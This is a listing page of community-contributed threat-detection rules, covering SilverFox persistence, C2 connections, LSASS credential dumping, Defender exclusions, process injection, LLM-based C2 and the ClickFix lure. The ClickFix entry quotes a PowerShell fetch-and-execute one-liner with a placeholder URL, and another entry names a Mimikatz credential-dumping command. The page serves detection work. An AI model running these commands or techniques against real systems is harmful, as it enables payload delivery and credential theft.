Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

60,142 detections

This rule detects the modification of Windows Registry Run keys, specifically targeting a value named 'MicrosoftUpdate' within the 'Run' registry path. This is a common persistence technique used by adversaries to ensure malicious programs or scripts automatically execute upon user logon by mimicking a legitimate system update process.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000
This rule detects the creation or presence of specific file artifacts ('PDF_C2089_20260911100446.exe' and 'active_desktop_render_x64.dll') within the '\AppData\Microsoft\Update\' directory. These file names and paths are characteristic of potential malware staging or persistence mechanisms, specifically associated with the SilverFox threat activity.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000
This rule detects network connections from internal devices to a specific remote IP address (134.122.155.135) over port 443. This is characteristic of communication with a known or suspicious Command and Control (C2) server.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000
This rule monitors DeviceProcessEvents for the execution of known malicious binaries associated with the SilverFox malware. It specifically looks for occurrences of three distinct SHA256 file hashes within the last 30 days.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000
Detects instances where the Adobe ColdFusion service (jrun.exe or java.exe) spawns common command-line shells, administrative tools, or utility processes. This behavior is indicative of potential exploitation of ColdFusion vulnerabilities, such as CVE-2023-26360 or CVE-2023-29298, where an adversary gains initial access and executes commands on the underlying system.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
14 days ago
004
Detects credential dumping attempts against the Local Security Authority Subsystem Service (LSASS) process. The rule identifies processes attempting to access LSASS memory using specific access masks often associated with credential extraction, or the presence of the Mimikatz 'sekurlsa::logonpasswords' command in the process command line.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
14 days ago
004
Detects the use of PowerShell to modify Microsoft Defender settings to add an exclusion path within the AppData directory. This behavior is often associated with malware or threat actors attempting to whitelist malicious payloads to evade security scanning.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
14 days ago
004
Detects a trojanized Electron application performing anti-sandbox environment checks by querying GPU hardware information via WMI or PowerShell CIM cmdlets. This activity is characterized by the presence of the PYTHONUTF8 environment variable and is identified as a precursor step to attempting Microsoft Defender exclusions and launching a malicious payload.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
14 days ago
004
Detects signs of the ClosedQuorum implant by correlating at least two redundant persistence mechanisms (Registry Run keys, Scheduled Tasks, WMI execution) on the same host within a 10-minute window. The rule focuses on artifacts originating from suspicious user-writable paths or unsigned binaries, while excluding known legitimate installation paths.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
13 days ago
003
Detects signs of the ClosedQuorum implant by correlating at least two redundant persistence mechanisms (Registry Run keys, Scheduled Tasks, WMI execution) on the same host within a 10-minute window. The rule focuses on artifacts originating from suspicious user-writable paths or unsigned binaries, while excluding known legitimate installation paths.
avatar
Arnold Chan@slaz
avatar
Hunters
13 days ago
003
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
13 days ago
003
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
13 days ago
003
Detects potential process injection attempts (e.g., Early Bird APC injection or process hollowing) where a process is spawned in a suspended state, followed shortly by a remote-thread or QueueUserAPC injection primitive targeting that same process. The rule correlates process creation events with subsequent API calls while excluding known legitimate patterns like .NET runtime operations, system updaters, and EDR/AV security components.
avatar
Arnold Chan@slaz
avatar
Hunters
13 days ago
103
KQL Query
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
7 days ago
000
Detects lateral movement (SMB, RDP, WinRM) performed by a host within 5 minutes of communicating with specific commercial LLM APIs. This rule targets behaviors indicative of automated lateral movement driven by an LLM-based C2, excluding common administrative tools, standard business hours, and frequently used processes.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
13 days ago
003
Detects the execution of multiple distinct host reconnaissance commands (e.g., systeminfo, whoami, ipconfig, AV/EDR checks, and domain enumeration) within a short window (10 minutes) originating from the same parent process. This pattern is characteristic of automated reconnaissance collection, often performed during the initial phases of an attack or as part of a C2 workflow. The rule includes exclusions for common administrative, monitoring, and RMM tools to reduce false positives.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
13 days ago
003
KQL Query from file: ClickFix RAT – Malicious MSI Execution
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
13 days ago
003
KQL Query from file: ClickFix RAT – Known Malicious File Hash
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Detection & Hunting Community
13 days ago
003
KQL Query
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
7 days ago
000